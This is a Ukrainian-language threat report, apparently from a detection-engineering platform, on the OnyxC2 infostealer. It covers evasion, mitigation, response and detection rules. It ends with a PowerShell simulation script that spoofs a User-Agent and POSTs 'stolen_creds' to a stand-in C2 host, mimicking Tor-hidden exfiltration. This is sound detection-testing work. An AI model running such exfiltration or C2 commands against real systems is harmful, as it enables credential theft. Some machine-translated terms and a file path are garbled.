OnyxC2: Новий стілер, що націлюється на 210 додатків
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
OnyxC2 – це нова платформа зловмисного ПЗ як послуга, спрямована на крадіжку облікових даних, двофакторних аутентифікаційних розширень та криптовалютних гаманців у понад 210 додатках. Платформа пропонує повний комерційний набір інструментів, включаючи панель управління, генератор та функціонал віддаленого доступу. Вона також базується на передових методах ухилення, включаючи завантаження DLL-підпліток з використанням перевищених підписаних бінарних файлів та зашифрованих компонентів завантажень.
Розслідування
Дослідники BlackFog вивчили кілька зразків OnyxC2 і виявили метод завантаження DLL, що зловживає підписаним хост-екзешаблом поряд з шкідливим DLL розміром понад 120 MB, замаскованим під бібліотеку графіки NVIDIA. Аналіз мережі показав, що зловмисне ПЗ спілкується через HTTPS з певною API точкою на бекенд. Дослідники також виявили зашифровані накладення, вбудовані в DLL, що допомагають зловмисному ПЗ уникати простого статичного аналізу.
Пом’якшення
Розгортання контролю ексфільтрації даних на кінцевій точці може допомогти блокувати несанкціонований вихідний трафік незалежно від того, який процес використовується. Безпекові команди повинні відслідковувати підозрілі завантаження DLL, пов’язані з підписаними бінарними файлами, та досліджувати незвично великі файли, що з’являються у шляхах, доступних для запису користувача. Сильні політики контролю додатків і відслідковування несанкціонованих запланованих завдань також рекомендуються.
Відповідь
Якщо виявлено активність OnyxC2, негайно ізолюйте уражену систему, щоб зупинити подальше викрадення даних. Захопіть повний дамп пам’яті, щоб відновити розшифроване завантаження та перевірити наявність активних сесій HVNC або діяльність проксі SOCKS5. Перевірте всі останні створені заплановані завдання та перевірте сховища облікових даних браузера на наявність слідів компрометації.
Потік атаки
Виявлення
Підозріле командне управління і, контроль за допомогою запиту DNS незвичайного доменного рівня (TLD) (через dns)
Перегляд
IOCs (HashSha256) для виявлення: Всередині OnyxC2: Новий стілер, що цілеиться на 210 додатків
Перегляд
IOCs (SourceIP) для виявлення: Всередині OnyxC2: Новий стілер, що цілеиться на 210 додатків
Перегляд
IOCs (DestinationIP) для виявлення: Всередині OnyxC2: Новий стілер, що цілеиться на 210 додатків
Перегляд
Виявлення комунікацій OnyxC2 Stealer C2 та анонімізації через TOR [Проксі]
Перегляд
Виявлення запланованого автозапуску завдань OnyxC2 та активності кейлоггера [Створення процесу Windows]
Перегляд
Виконання симуляції
Передумова: Перевірка телеметрії та базових налаштувань повинна бути успішно завершена.
Обґрунтування: Цей розділ докладно описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди і розповідь МАЮТЬ безпосередньо відповідати визначеним TTP і спрямовані на генерування точної телеметрії, яку очікує логіка виявлення. Абстрактні або несумісні приклади призведуть до неправильного діагнозу.
-
Розповідь про атаку та команди: Противник прагне ексфільтрувати викрадені облікові дані браузера. Щоб уникнути виявлення моніторингом мережевої безпеки, вони розгортатимуть портативний двійковий Tor для створення анонімного тунелю. Як тільки тунель встановлений, зловмисне ПЗ починає з’єднання з його сервером Командування та Контролю (C2). Щоб влитися в легітимний веб-трафік, зловмисне ПЗ фальшує свій User-Agent, щоб виглядати як “Cloudflare” і націлюється на специфічну API точку, розміщену за проксі Cloudflare. Ця послідовність призначена для активації кореляції в правилах виявлення
torаргументів командного рядка та специфічної/backend/api/app.phpшаблон URL. -
Сценарій регресійного тестування:
# Симуляція комунікації OnyxC2 Stealer # 1. Симулювати наявність Tor (Створення фіктивного файлу/поведінки процесу) # У реальному сценарії це буде фактичний tor.exe $TorPath = "$env:TEMPtor.exe" "Симульований вміст бінарного Tor" | Out-File -FilePath $TorPath # Створити подію виконання процесу для 'tor' через командний рядок Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Щоб забезпечити логіку виявлення 'command_line|contains: tor' активується, # ми виконуємо команду, що містить рядок 'tor' cmd.exe /c "echo initializing tor proxy..." # 2. Симулювати мережеве з'єднання C2 # Ми використовуємо PowerShell для симуляції мережевого з'єднання з певною URL-адресою і User-Agent $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Спроба зв'язку C2 з $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Команди очищення:
# Видалення симульованих артефактів Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Очищення симуляції завершено."